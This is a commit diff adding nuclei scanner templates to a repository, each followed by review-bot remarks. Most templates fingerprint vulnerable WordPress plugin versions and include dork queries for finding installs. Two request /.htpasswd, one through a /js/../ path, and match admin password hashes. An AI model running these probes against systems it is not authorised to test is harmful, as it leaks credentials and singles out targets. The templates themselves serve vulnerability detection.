20241221
actions-user committed Dec 21, 2024
1 parent 6b49cf6 commit 29a16de
Showing 476 changed files with 28,019 additions and 1 deletion.
2 changes: 1 addition & 1 deletion date.txt
@@ -1 +1 @@
20241220
20241221
474 changes: 474 additions & 0 deletions poc.txt


59 changes: 59 additions & 0 deletions poc/auth/authentication-via-otp-using-firebase.yaml
@@ -0,0 +1,59 @@
id: authentication-via-otp-using-firebase-9097fcd5b178e75d87723dfdbc4c911b

info:
name: >
Firebase OTP Authentication <= 1.0.1 - Missing Authorization to Privilege Escalation
author: topscoder
severity: high
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/8607acb6-743b-4a32-9941-27ce72379f0a?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/authentication-via-otp-using-firebase/"
google-query: inurl:"/wp-content/plugins/authentication-via-otp-using-firebase/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,authentication-via-otp-using-firebase,high

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/authentication-via-otp-using-firebase/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "authentication-via-otp-using-firebase"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.0.1')
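Review bot: The `tags` line labels this template `cve` while `cve-id`, `cvss-metrics` and `cvss-score` under `classification` are left bare, which YAML reads as null and which contradicts the tag; either fill them from the referenced Wordfence entry or drop the empty keys and the tag, e.g. `tags: wordpress,wp-plugin,authentication-via-otp-using-firebase,high`. The empty `description: >` is where a hit should be explained: the template only reads `Stable tag` from readme.txt and never exercises the missing-authorization path, so a match is a version fingerprint for a likely-vulnerable install, not confirmed privilege escalation, and that matters for a `severity: high` finding. `shodan-query: 'vuln:'` looks like an unfilled placeholder and should be removed rather than shipped as metadata.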
59 changes: 59 additions & 0 deletions poc/auth/better-wp-login-page.yaml
@@ -0,0 +1,59 @@
id: better-wp-login-page-6e43930d2bdbe3c110384cb22d290456

info:
name: >
Better WP Login Page <= 1.1.2 - Authenticated (Administrator+) Stored Cross-Site Scripting
author: topscoder
severity: low
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/892cb187-95b6-4df7-a0dc-4db6d8cee902?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/better-wp-login-page/"
google-query: inurl:"/wp-content/plugins/better-wp-login-page/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,better-wp-login-page,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/better-wp-login-page/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "better-wp-login-page"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.1.2')
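Review bot: The word matcher requiring the literal slug `better-wp-login-page` in the readme body may not hold: a plugin readme.txt commonly carries the display name and the Stable tag but not the directory slug, so under `matchers-condition: and` the template can silently miss a site that is running the plugin — confirm against the live readme before relying on it. Because the request path already pins the plugin directory, matching a readme header is more robust, e.g. `- "Stable tag:"` or the `=== Better WP Login Page ===` title line. Note also that a readme is served even when the plugin is deactivated and its Stable tag can lag the installed version, so the (currently empty) `description` should state that a positive means a vulnerable version is likely present, not that the authenticated stored XSS was exercised.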
19 changes: 19 additions & 0 deletions poc/auth/feiyuxing-web-htpasswd-infoleak.yaml
@@ -0,0 +1,19 @@
id: feiyuxing-web-htpasswd-infoleak

info:
name: feiyuxing-web-htpasswd-infoleak
author: PokerSec
severity: high
metadata:
fofasearch: body="js/select2css.js"

http:
- raw:
- |
GET /.htpasswd HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code==200 && contains_all(body,"$1$$") && contains_all(body,"admin")
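Review bot: `contains_all(body,"$1$$")` only matches the empty-salt MD5-crypt form (`$1$$hash`), not a general `$1$salt$hash` entry, and `contains_all` with a single needle is just `contains`. If this device family is known to emit empty-salt hashes that should be stated in a `description`; otherwise a regex matcher such as `- '(?m)^admin:\$1\$'` would be both broader and tie the `admin` user and the hash to the same line instead of two independent substring checks anywhere in the body. The `info` block also has no `description`, `tags` or `reference`, and `fofasearch` does not look like the metadata key nuclei tooling reads (`fofa-query` is used elsewhere in this commit) — verify against the schema in use so the query is not silently ignored.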
19 changes: 19 additions & 0 deletions poc/auth/feiyuxing-web-js-htpasswd-infoleak.yaml
@@ -0,0 +1,19 @@
id: feiyuxing-web-js-htpasswd-infoleak

info:
name: feiyuxing-web-js-htpasswd-infoleak
author: PokerSec
severity: high
metadata:
fofasearch: body="js/select2css.js" || title=="飞鱼星企业级智能上网行为管理系统"

http:
- raw:
- |
GET /js/../.htpasswd HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code==200 && contains_all(body,"$1$$") && contains_all(body,"admin")
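Review bot: The `GET /js/../.htpasswd` request only differs from the sibling `/.htpasswd` template if the dot segment actually reaches the server; if the HTTP client normalizes the path before sending, both templates issue the identical request and this one adds nothing — confirm with a proxy capture, and if normalization occurs set `unsafe: true` on the request so the raw request line is sent verbatim. The intent presumably is that a web-root listener blocks `/.htpasswd` while a `/js/` location does not, which is worth a `description` line so a future reader does not deduplicate the two templates. A `tags` line (e.g. `tags: feiyuxing,exposure,htpasswd`) would also let it be selected alongside the other exposure checks.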
59 changes: 59 additions & 0 deletions poc/auth/gaxx-keywords.yaml
@@ -0,0 +1,59 @@
id: gaxx-keywords-1643b95f00dd189ad99da6edffb24782

info:
name: >
Gaxx Keywords <= 0.2 - Cross-Site Request Forgery to Cross-Site Scripting
author: topscoder
severity: medium
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/7061781d-999b-47a7-b4b2-f0335c6247f8?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/gaxx-keywords/"
google-query: inurl:"/wp-content/plugins/gaxx-keywords/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,gaxx-keywords,medium

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/gaxx-keywords/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "gaxx-keywords"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 0.2')
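Review bot: Small, long-unmaintained plugins frequently ship `Stable tag: trunk`, which the `([0-9.]+)` capture does not match; `version` then stays unset, the `compare_versions` DSL cannot evaluate, and the template reports nothing even though the plugin is present and the name gives no indication that a fixed release exists. Consider a second extractor over the main plugin file's `Version:` header, or at minimum note in `description` that readmes with a `trunk` Stable tag are not detected. The `classification` keys are left bare (null); `severity: medium` for CSRF-to-XSS is plausible but should be backed by the CVSS vector from the referenced entry if one is published.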
59 changes: 59 additions & 0 deletions poc/auth/push-monkey-desktop-push-notifications.yaml
@@ -0,0 +1,59 @@
id: push-monkey-desktop-push-notifications-08a320e54df07e056df6d0f01f123316

info:
name: >
Push Monkey Pro – Web Push Notifications and WooCommerce Abandoned Cart <= 3.9 - Cross-Site Request Forgery to Stored Cross-Site Scripting
author: topscoder
severity: medium
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/adfe66d7-5402-447f-bca2-8de5b6447cbb?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/push-monkey-desktop-push-notifications/"
google-query: inurl:"/wp-content/plugins/push-monkey-desktop-push-notifications/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,push-monkey-desktop-push-notifications,medium

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/push-monkey-desktop-push-notifications/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "push-monkey-desktop-push-notifications"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 3.9')
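Review bot: Two extractors both named `version` run the same `Stable tag` regex; from the template alone it appears the first (`internal: true`) feeds `compare_versions` and the second only surfaces the value in the finding, which is a known nuclei idiom but unexplained here. A one-line comment above the second, `# non-internal copy so the matched version is shown in the result`, would stop the next reader from "deduplicating" them and losing the output. The `name` promises a CSRF-to-stored-XSS in the WooCommerce abandoned-cart feature, yet the only evidence collected is the readme Stable tag, so the empty `description` should say the vulnerability itself is not exercised.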
@@ -0,0 +1,59 @@
id: reactflow-session-replay-heatmap-38be705ad3ea6bee0782af8bbd1e1f3a

info:
name: >
Reactflow Visitor Recording and Heatmaps <= 1.0.10 - Cross-Site Request Forgery to Reflected Cross-Site Scripting
author: topscoder
severity: medium
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/eb360c56-e144-4dc5-8bfb-715a014cb8e6?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/reactflow-session-replay-heatmap/"
google-query: inurl:"/wp-content/plugins/reactflow-session-replay-heatmap/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,reactflow-session-replay-heatmap,medium

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/reactflow-session-replay-heatmap/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "reactflow-session-replay-heatmap"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.0.10')
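Review bot: `shodan-query: 'vuln:'` is an unfilled placeholder and the `classification` fields are bare nulls, so the metadata block emits noise rather than information; remove the placeholder and either populate `cve-id`/`cvss-metrics` from the referenced Wordfence entry or drop those keys. With `redirects: true`, a target that answers unknown paths with a 200 landing page still passes the status and slug-word matchers, and the template then relies only on `compare_versions` failing on an unset `version` to stay quiet — that guard is implicit, so a `description` explaining that a hit is a readme version fingerprint (not an exercised reflected XSS) and a `# version extractor doubles as the presence check` comment would make the design intent visible. The file-header line for this section is not in view, so the path is inferred from the request URL.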
